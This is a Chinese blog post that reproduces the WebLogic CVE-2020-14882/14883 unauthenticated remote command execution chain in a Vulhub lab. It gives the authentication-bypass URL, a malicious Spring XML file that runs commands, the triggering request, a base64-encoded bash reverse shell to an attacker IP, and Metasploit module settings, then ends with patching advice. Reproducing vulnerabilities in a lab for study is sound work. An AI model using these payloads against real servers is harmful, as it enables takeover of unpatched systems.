CVE-2020-14882、CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞

已于 2022-07-03 21:33:08 修改
阅读量1.2k 收藏 2
点赞数
文章标签: 漏洞复现
于 2022-07-02 12:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45715461/article/details/125566648
版权

1 漏洞信息

漏洞名称Weblogic 管理控制台未授权远程命令执行漏洞
漏洞编号CVE-2020-14882、CVE-2020-14883
危害等级高危
CVSS评分10.0
漏洞类型中间件漏洞
漏洞厂商Oracle
漏洞组件WebLogic
受影响版本Oracle WeblogicServer 10.3.6.0.0
Oracle WeblogicServer 12.1.3.0.0
Oracle WeblogicServer 12.2.1.3.0
Oracle WeblogicServer 12.2.1.4.0
Oracle WeblogicServer 14.1.1.0.0
漏洞概述CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

2 环境搭建

2.1 环境概述

  • Linux操作系统(Vuhub环境)

2.2 搭建过程

docker-compose up -d

{width=“5.759027777777778in”
height=“0.19375in”}

3 漏洞复现

访问漏洞URL:http://192.168.1.136:7001/console/login/LoginForm.jsp,发现需要登录。

{width=“5.763888888888889in”
height=“2.683333333333333in”}

然后访问CVE-2020-14882漏洞存在的未授权访问路径,发现成功,说明确实是存在未授权访问

URL:http://192.168.1.136:7001/console/css/%252e%252e%252fconsole.portal

{width=“5.759027777777778in”
height=“2.716666666666667in”}

我们需要构造一个XML文件,来原来实现远程代码执行漏洞CVE-2020-14883,并将其保存在Weblogic可以访问到的服务器上

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

{width=“5.758333333333334in”
height=“1.1756944444444444in”}

把恶意的xml文件所在的文件夹里开启使用python开启web服务

python -m http.server

{width=“4.525in”
height=“0.4166666666666667in”}

{width=“5.763194444444444in”
height=“2.011111111111111in”}

执行代码

http://192.168.1.136:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.1.1:8000/rce.xml")

{width=“5.761111111111111in”
height=“2.9430555555555555in”}

在容器内查看是否在/tmp目录下创建了success文件,发现确实是创建了

docker exec -i -t a8a30aa2cb4c(镜像的id) /bin/bash		#进入镜像内部
cd /tmp/
ls

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bMOvvsAV-1656855179548)(在这里插入图片描述]
){width=“5.759722222222222in”
height=“0.3972222222222222in”}

我们还可以将反弹shell的命令加入到xml文件中

bash -i >& /dev/tcp/192.168.1.129/2021 0>1		进行bash加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzIwMjEgMD4x}|{base64,-d}|{bash,-i}

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzIwMjEgMD4x}|{base64,-d}|{bash,-i}]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

{width=“5.758333333333334in”
height=“2.0194444444444444in”}

反弹成功,但是不知道为什么它自己执行exit退出

{width=“4.308333333333334in”
height=“0.975in”}

还可以使用msf的exploit/multi/http/weblogic_admin_handle_rce模块,但是这个模块返回的session会很多。

use exploit/multi/http/weblogic_admin_handle_rce
set rhost 192.168.1.136
set lhost 192.168.1.129
set target Linux Dropper
run

{width=“4.216666666666667in”
height=“0.6583333333333333in”}

{width=“5.761805555555555in”
height=“0.45902777777777776in”}

4 修复建议

1、安装Oracle官方补丁即可

2、暂时对外关闭后台 /console/console.portal 的访问权限。

俺不想学习
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cve_2020_14883.zip
05-28
weblogic 解决CVE-2020-14883漏洞
Weblogic管理控制台授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
xhscxj的博客
10-21 622
启动环境访问登录页面此时我们不知道密码burp抓包修改访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过,二是通过。直接访问如下URL,即可利用这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在类。是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)漏洞复现
weixin_70045024的博客
09-18 1577
Weblogic
CVE-2020-14882&14883weblogic授权命令执行漏洞复现
二狗的博客
03-29 650
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Weblogic授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1514
weblogic漏洞复现
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
cve_2020_14883_NA7A.zip
05-28
weblogic 解决CVE-2020-14883漏洞
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1440
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞,远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
WeblogicCVE-2020-14882,CVE-2020-14883) 管理控制台授权远程命令执行漏洞
god_Zeo的安全博客
11-02 5963
WeblogicCVE-2020-14882,CVE-2020-14883) 管理控制台授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
【Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1705
【Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 3897
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
CVE-2020-14882&14883:weblogic 授权命令执行漏洞复现
Jietewang的博客
12-01 1547
1.Weblogic简介 Oracle WebLogic Server是用于构建和部署企业Java EE应用程序的业界最佳应用程序服务器,并支持新功能,这些新功能可降低运营成本,提高性能,增强可伸缩性并支持Oracle Applications产品组合。 这是一个Java的中间件,本人是这么理解的那要想更加详细的理解请查看官方介绍【官方介绍】。 2.漏洞描述 复现漏洞编号CVE-2020-14882,CVE-2020-14883 可以构造特殊的HTTP请求,在经身份验证的情况下访问Weblogi
CVE-2020-14882&14883 Weblogic 管理控制台授权远程命令执行漏洞复现
ierciyuan的博客
07-30 894
CVE-2020-14882&14883Weblogic管理控制台授权远程命令执行漏洞复现。提供相关软件包(网盘)
CVE-2020-14883验证
weixin_39811856的博客
11-10 3346
[CVE-2020-14883] Oracle WebLogic Server认证的远程代码执行(RCE) 基于windows的受攻击对象:tangosol.coherence.mvel2.sh.ShellSession() POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: vulnerablehost:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 ..
Weblogic CVE-2020-14882~14883 exp脚本
include_heqile的博客
11-30 708
友链 https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483812&idx=1&sn=45c44905a3b78bd3617f5ec701e9890a&chksm=c2b2a647f5c52f510b48a6c790a4971d2944a7e79f9c706378994398dd2ae4ad84641e7f5067&token=738837310&lang=zh_CN#rd
CVE-2020-14882漏洞修复
最新发布
07-28
- *1* [CVE-2020-14882:weblogic 授权命令执行漏洞验证及修复](https://blog.csdn.net/weixin_38896449/article/details/110480656)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值